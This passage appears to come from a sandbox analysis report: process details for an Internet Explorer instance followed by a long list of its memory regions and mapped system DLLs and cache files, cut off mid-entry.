os_parent_pid = "0xbdc" cmd_line = "\"C:\\Program Files\\Internet Explorer\\iexplore.exe\" SCODEF:3036 CREDAT:14337" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 571 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 572 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 573 start_va = 0x50000 end_va = 0x14ffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 574 start_va = 0x1210000 end_va = 0x12b5fff entry_point = 0x1210000 region_type = mapped_file name = "iexplore.exe" filename = "\\Program Files\\Internet Explorer\\iexplore.exe" (normalized: "c:\\program files\\internet explorer\\iexplore.exe") Region: id = 575 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 576 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 577 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 578 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 579 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 580 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 581 start_va = 0x170000 end_va = 0x17ffff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 582 start_va = 0x1a0000 end_va = 0x29ffff entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 583 start_va = 0x2a0000 end_va = 0x306fff entry_point = 0x2a0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 584 start_va = 0x753f0000 end_va = 0x753fbfff entry_point = 0x753f0000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 585 start_va = 0x75420000 end_va = 0x7553cfff entry_point = 0x75420000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 586 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 587 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 588 start_va = 0x75830000 end_va = 0x76479fff entry_point = 0x75830000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 589 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 590 start_va = 0x76650000 end_va = 0x76744fff entry_point = 0x76650000 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll") Region: id = 591 start_va = 0x76750000 end_va = 0x768abfff entry_point = 0x76750000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 592 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 593 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 594 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 595 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 596 start_va = 0x76c10000 end_va = 0x76c9efff entry_point = 0x76c10000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 597 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 598 start_va = 0x76e10000 end_va = 0x76e66fff entry_point = 0x76e10000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 599 start_va = 0x76e70000 end_va = 0x76fa5fff entry_point = 0x76e70000 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll") Region: id = 600 start_va = 0x76fb0000 end_va = 0x771aafff entry_point = 0x76fb0000 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 601 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 602 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 603 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 604 start_va = 0x310000 end_va = 0x3d7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000310000" filename = "" Region: id = 605 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 606 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 607 start_va = 0x20000 end_va = 0x26fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 608 start_va = 0x40000 end_va = 0x41fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 609 start_va = 0x150000 end_va = 0x151fff entry_point = 0x150000 region_type = mapped_file name = "iexplore.exe.mui" filename = "\\Program Files\\Internet Explorer\\en-US\\iexplore.exe.mui" (normalized: "c:\\program files\\internet explorer\\en-us\\iexplore.exe.mui") Region: id = 610 start_va = 0x160000 end_va = 0x160fff entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 611 start_va = 0x180000 end_va = 0x180fff entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 612 start_va = 0x3e0000 end_va = 0x4e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003e0000" filename = "" Region: id = 613 start_va = 0x4f0000 end_va = 0x10effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004f0000" filename = "" Region: id = 614 start_va = 0x12c0000 end_va = 0x158efff entry_point = 0x12c0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 615 start_va = 0x6cff0000 end_va = 0x6da6ffff entry_point = 0x6cff0000 region_type = mapped_file name = "ieframe.dll" filename = "\\Windows\\System32\\ieframe.dll" (normalized: "c:\\windows\\system32\\ieframe.dll") Region: id = 616 start_va = 0x72360000 end_va = 0x7239bfff entry_point = 0x72360000 region_type = mapped_file name = "oleacc.dll" filename = "\\Windows\\System32\\oleacc.dll" (normalized: "c:\\windows\\system32\\oleacc.dll") Region: id = 617 start_va = 0x75820000 end_va = 0x75824fff entry_point = 0x75820000 region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\System32\\psapi.dll" (normalized: "c:\\windows\\system32\\psapi.dll") Region: id = 618 start_va = 0x190000 end_va = 0x190fff entry_point = 0x190000 region_type = mapped_file name = "oleaccrc.dll" filename = "\\Windows\\System32\\oleaccrc.dll" (normalized: "c:\\windows\\system32\\oleaccrc.dll") Region: id = 619 start_va = 0x10f0000 end_va = 0x10f1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000010f0000" filename = "" Region: id = 620 start_va = 0x1100000 end_va = 0x1100fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001100000" filename = "" Region: id = 621 start_va = 0x1110000 end_va = 0x1111fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001110000" filename = "" Region: id = 622 start_va = 0x1120000 end_va = 0x1120fff entry_point = 0x0 region_type = private name = "private_0x0000000001120000" filename = "" Region: id = 623 start_va = 0x74360000 end_va = 0x744fdfff entry_point = 0x74360000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll") Region: id = 624 start_va = 0x771b0000 end_va = 0x7722afff entry_point = 0x771b0000 region_type = mapped_file name = "comdlg32.dll" filename = "\\Windows\\System32\\comdlg32.dll" (normalized: "c:\\windows\\system32\\comdlg32.dll") Region: id = 625 start_va = 0x5fff0000 end_va = 0x5fffffff entry_point = 0x0 region_type = private name = "private_0x000000005fff0000" filename = "" Region: id = 626 start_va = 0x6da80000 end_va = 0x6dab4fff entry_point = 0x6da80000 region_type = mapped_file name = "ieshims.dll" filename = "\\Program Files\\Internet Explorer\\IEShims.dll" (normalized: "c:\\program files\\internet explorer\\ieshims.dll") Region: id = 627 start_va = 0x1130000 end_va = 0x1130fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001130000" filename = "" Region: id = 628 start_va = 0x1140000 end_va = 0x1141fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001140000" filename = "" Region: id = 629 start_va = 0x752d0000 end_va = 0x752dbfff entry_point = 0x752d0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 630 start_va = 0x1180000 end_va = 0x11bffff entry_point = 0x0 region_type = private name = "private_0x0000000001180000" filename = "" Region: id = 631 start_va = 0x741e0000 end_va = 0x7421ffff entry_point = 0x741e0000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 632 start_va = 0x1150000 end_va = 0x1150fff entry_point = 0x0 region_type = private name = "private_0x0000000001150000" filename = "" Region: id = 633 start_va = 0x1160000 end_va = 0x1161fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001160000" filename = "" Region: id = 634 start_va = 0x1170000 end_va = 0x1171fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001170000" filename = "" Region: id = 635 start_va = 0x1590000 end_va = 0x166efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001590000" filename = "" Region: id = 636 start_va = 0x1670000 end_va = 0x16ddfff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001670000" filename = "" Region: id = 637 start_va = 0x1760000 end_va = 0x185ffff entry_point = 0x0 region_type = private name = "private_0x0000000001760000" filename = "" Region: id = 638 start_va = 0x1880000 end_va = 0x197ffff entry_point = 0x0 region_type = private name = "private_0x0000000001880000" filename = "" Region: id = 639 start_va = 0x75370000 end_va = 0x7537dfff entry_point = 0x75370000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 640 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 641 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 642 start_va = 0x1980000 end_va = 0x1a7ffff entry_point = 0x0 region_type = private name = "private_0x0000000001980000" filename = "" Region: id = 643 start_va = 0x1b40000 end_va = 0x1c3ffff entry_point = 0x0 region_type = private name = "private_0x0000000001b40000" filename = "" Region: id = 644 start_va = 0x1d60000 end_va = 0x1f5ffff entry_point = 0x0 region_type = private name = "private_0x0000000001d60000" filename = "" Region: id = 645 start_va = 0x73eb0000 end_va = 0x73ec2fff entry_point = 0x73eb0000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 646 start_va = 0x7ffd9000 end_va = 0x7ffd9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 647 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 648 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 649 start_va = 0x6dac0000 end_va = 0x6daf2fff entry_point = 0x6dac0000 region_type = mapped_file name = "sqmapi.dll" filename = "\\Program Files\\Internet Explorer\\sqmapi.dll" (normalized: "c:\\program files\\internet explorer\\sqmapi.dll") Region: id = 650 start_va = 0x11c0000 end_va = 0x11c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011c0000" filename = "" Region: id = 651 start_va = 0x1c40000 end_va = 0x1d3ffff entry_point = 0x0 region_type = private name = "private_0x0000000001c40000" filename = "" Region: id = 652 start_va = 0x75780000 end_va = 0x75802fff entry_point = 0x75780000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 653 start_va = 0x11d0000 end_va = 0x11d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011d0000" filename = "" Region: id = 654 start_va = 0x73c00000 end_va = 0x73c20fff entry_point = 0x73c00000 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 655 start_va = 0x74220000 end_va = 0x74314fff entry_point = 0x74220000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 656 start_va = 0x75730000 end_va = 0x75774fff entry_point = 0x75730000 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 657 start_va = 0x11f0000 end_va = 0x120efff entry_point = 0x11f0000 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000001a.db" filename = "\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000001a.db" (normalized: "c:\\users\\eebsym5\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000001a.db") Region: id = 658 start_va = 0x16e0000 end_va = 0x16e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000016e0000" filename = "" Region: id = 659 start_va = 0x75380000 end_va = 0x7538afff entry_point = 0x75380000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 660 start_va = 0x1fa0000 end_va = 0x209ffff entry_point = 0x0 region_type = private name = "private_0x0000000001fa0000" filename = "" Region: id = 661 start_va = 0x75400000 end_va = 0x75411fff entry_point = 0x75400000 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 662 start_va = 0x75590000 end_va = 0x755b6fff entry_point = 0x75590000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 663 start_va = 0x764b0000 end_va = 0x7664cfff entry_point = 0x764b0000 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 664 start_va = 0x7ffd8000 end_va = 0x7ffd8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 665 start_va = 0x11e0000 end_va = 0x11e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011e0000" filename = "" Region: id = 666 start_va = 0x20a0000 end_va = 0x2492fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000020a0000" filename = "" Region: id = 667 start_va = 0x74bf0000 end_va = 0x74c2afff entry_point = 0x74bf0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 668 start_va = 0x74e50000 end_va = 0x74e65fff entry_point = 0x74e50000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 732 start_va = 0x16f0000 end_va = 0x16f1fff entry_point = 0x0 region_type = private name = "private_0x00000000016f0000" filename = "" Region: id = 733 start_va = 0x1700000 end_va = 0x1701fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001700000" filename = "" Region: id = 734 start_va = 0x2580000 end_va = 0x267ffff entry_point = 0x0 region_type = private name = "private_0x0000000002580000" filename = "" Region: id = 735 start_va = 0x2800000 end_va = 0x28fffff entry_point = 0x0 region_type = private name = "private_0x0000000002800000" filename = "" Region: id = 736 start_va = 0x6dd60000 end_va = 0x6dd8afff entry_point = 0x6dd60000 region_type = mapped_file name = "ieproxy.dll" filename = "\\Program Files\\Internet Explorer\\ieproxy.dll" (normalized: "c:\\program files\\internet explorer\\ieproxy.dll") Region: id = 737 start_va = 0x752b0000 end_va = 0x752cafff entry_point = 0x752b0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 738 start_va = 0x7ffd6000 end_va = 0x7ffd6fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd6000" filename = "" Region: id = 739 start_va = 0x7ffd7000 end_va = 0x7ffd7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd7000" filename = "" Region: id = 740 start_va = 0x1710000 end_va = 0x173bfff entry_point = 0x1710000 region_type = mapped_file name = "index.dat" filename = "\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\index.dat" (normalized: "c:\\users\\eebsym5\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\index.dat") Region: id = 741 start_va = 0x1740000 end_va = 0x1747fff entry_point = 0x1740000 region_type = mapped_file name = "index.dat" filename = "\\Users\\EEBsYm5\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\microsoft\\windows\\cookies\\index.dat") Region: id = 742 start_va = 0x1750000 end_va = 0x175ffff entry_point = 0x1750000 region_type = mapped_file name = "index.dat" filename = "\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat" (normalized: "c:\\users\\eebsym5\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\index.dat") Region: id = 743 start_va = 0x75810000 end_va = 0x75815fff entry_point = 0x75810000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 744 start_va = 0x77380000 end_va = 0x773b4fff entry_point = 0x77380000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 745 start_va = 0x1a90000 end_va = 0x1acffff entry_point = 0x0 region_type = private name = "private_0x0000000001a90000" filename = "" Region: id = 746 start_va = 0x737c0000 end_va = 0x737c6fff entry_point = 0x737c0000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 747 start_va = 0x737d0000 end_va = 0x737ebfff entry_point = 0x737d0000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 748 start_va = 0x74cd0000 end_va = 0x74d13fff entry_point = 0x74cd0000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 749 start_va = 0x1860000 end_va = 0x1860fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001860000" filename = "" Region: id = 750 start_va = 0x1ae0000 end_va = 0x1ae1fff entry_point = 0x0 region_type = private name = "private_0x0000000001ae0000" filename = "" Region: id = 751 start_va = 0x2500000 end_va = 0x253ffff entry_point = 0x0 region_type = private name = "private_0x0000000002500000" filename = "" Region: id = 752 start_va = 0x6dd30000 end_va = 0x6dd5dfff entry_point = 0x6dd30000 region_type = mapped_file name = "mlang.dll" filename = "\\Windows\\System32\\mlang.dll" (normalized: "c:\\windows\\system32\\mlang.dll") Region: id = 753 start_va = 0x1870000 end_va = 0x1870fff entry_point = 0x0 region_type = private name = "private_0x0000000001870000" filename = "" Region: id = 754 start_va = 0x1a80000 end_va = 0x1a80fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001a80000" filename = "" Region: id = 755 start_va = 0x1af0000 end_va = 0x1b0ffff entry_point = 0x0 region_type = private name = "private_0x0000000001af0000" filename = "" Region: id = 756 start_va = 0x2900000 end_va = 0x322ffff entry_point = 0x2900000 region_type = mapped_file name = "staticcache.dat" filename = "\\Windows\\Fonts\\StaticCache.dat" (normalized: "c:\\windows\\fonts\\staticcache.dat") Region: id = 757 start_va = 0x33e0000 end_va = 0x33effff entry_point = 0x0 region_type = private name = "private_0x00000000033e0000" filename = "" Region: id = 758 start_va = 0x6dae0000 end_va = 0x6daf0fff entry_point = 0x6dae0000 region_type = mapped_file name = "acroiehelpershim.dll" filename = "\\Program Files\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroIEHelperShim.dll" (normalized: "c:\\program files\\common files\\adobe\\acrobat\\activex\\acroiehelpershim.dll") Region: id = 759 start_va = 0x71320000 end_va = 0x713adfff entry_point = 0x71320000 region_type = mapped_file name = "msvcp90.dll" filename = "\\Windows\\winsxs\\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\\msvcp90.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\\msvcp90.dll") Region: id = 760 start_va = 0x713b0000 end_va = 0x71452fff entry_point = 0x713b0000 region_type = mapped_file name = "msvcr90.dll" filename = "\\Windows\\winsxs\\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\\msvcr90.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\\msvcr90.dll") Region: id = 761 start_va = 0x718b0000 end_va = 0x718fbfff entry_point = 0x718b0000 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\System32\\apphelp.dll" (normalized: "c:\\windows\\system32\\apphelp.dll") Region: id = 762 start_va = 0x6dde0000 end_va = 0x6de63fff entry_point = 0x6dde0000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll") Region: id = 763 start_va = 0x1ad0000 end_va = 0x1ad0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ad0000" filename = "" Region: id = 764 start_va = 0x1f90000 end_va = 0x1f9ffff entry_point = 0x0 region_type = private name = "private_0x0000000001f90000" filename = "" Region: id = 765 start_va = 0x6dad0000 end_va = 0x6dadffff entry_point = 0x6dad0000 region_type = mapped_file name = "acroiehelper.dll" filename = "\\Program Files\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroIEHelper.dll" (normalized: "c:\\program files\\common files\\adobe\\acrobat\\activex\\acroiehelper.dll") Region: id = 766 start_va = 0x1b10000 end_va = 0x1b12fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b10000" filename = "" Region: id = 767 start_va = 0x26e0000 end_va = 0x26effff entry_point = 0x0 region_type = private name = "private_0x00000000026e0000" filename = "" Region: id = 768 start_va = 0x712f0000 end_va = 0x7131afff entry_point = 0x712f0000 region_type = mapped_file name = "atl90.dll" filename = "\\Windows\\winsxs\\x86_microsoft.vc90.atl_1fc8b3b9a1e18e3b_9.0.30729.6161_none_51cd0a7abbe4e19b\\ATL90.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.vc90.atl_1fc8b3b9a1e18e3b_9.0.30729.6161_none_51cd0a7abbe4e19b\\atl90.dll") Region: id = 769 start_va = 0x71460000 end_va = 0x7186afff entry_point = 0x71460000 region_type = mapped_file name = "grooveex.dll" filename = "\\PROGRA~1\\MICROS~1\\Office14\\GROOVEEX.DLL" (normalized: "c:\\progra~1\\micros~1\\office14\\grooveex.dll") Region: id = 770 start_va = 0x1b20000 end_va = 0x1b23fff entry_point = 0x0 region_type = private name = "private_0x0000000001b20000" filename = "" Region: id = 771 start_va = 0x1b30000 end_va = 0x1b3ffff entry_point = 0x0 region_type = private name = "private_0x0000000001b30000" filename = "" Region: id = 772 start_va = 0x1d40000 end_va = 0x1d57fff entry_point = 0x0 region_type = private name = "private_0x0000000001d40000" filename = "" Region: id = 773 start_va = 0x1f60000 end_va = 0x1f60fff entry_point = 0x0 region_type = private name = "private_0x0000000001f60000" filename = "" Region: id = 774 start_va = 0x1f70000 end_va = 0x1f7ffff entry_point = 0x0 region_type = private name = "private_0x0000000001f70000" filename = "" Region: id = 775 start_va = 0x1f80000 end_va = 0x1f8ffff entry_point = 0x0 region_type = private name = "private_0x0000000001f80000" filename = "" Region: id = 776 start_va = 0x24a0000 end_va = 0x24affff entry_point = 0x0 region_type = private name = "private_0x00000000024a0000" filename = "" Region: id = 777 start_va = 0x24b0000 end_va = 0x24bffff entry_point = 0x0 region_type = private name = "private_0x00000000024b0000" filename = "" Region: id = 778 start_va = 0x24c0000 end_va = 0x24cffff entry_point = 0x0 region_type = private name = "private_0x00000000024c0000" filename = "" Region: id = 779 start_va = 0x24d0000 end_va = 0x24dffff entry_point = 0x0 region_type = private name = "private_0x00000000024d0000" filename = "" Region: id = 780 start_va = 0x24e0000 end_va = 0x24effff entry_point = 0x0 region_type = private name = "private_0x00000000024e0000" filename = "" Region: id = 781 start_va = 0x3380000 end_va = 0x33bffff entry_point = 0x0 region_type = private name = "private_0x0000000003380000" filename = "" Region: id = 782 start_va = 0x70660000 end_va = 0x70ec3fff entry_point = 0x70660000 region_type = mapped_file name = "grooveintlresource.dll" filename = "\\PROGRA~1\\MICROS~1\\Office14\\1033\\GrooveIntlResource.dll" (normalized: 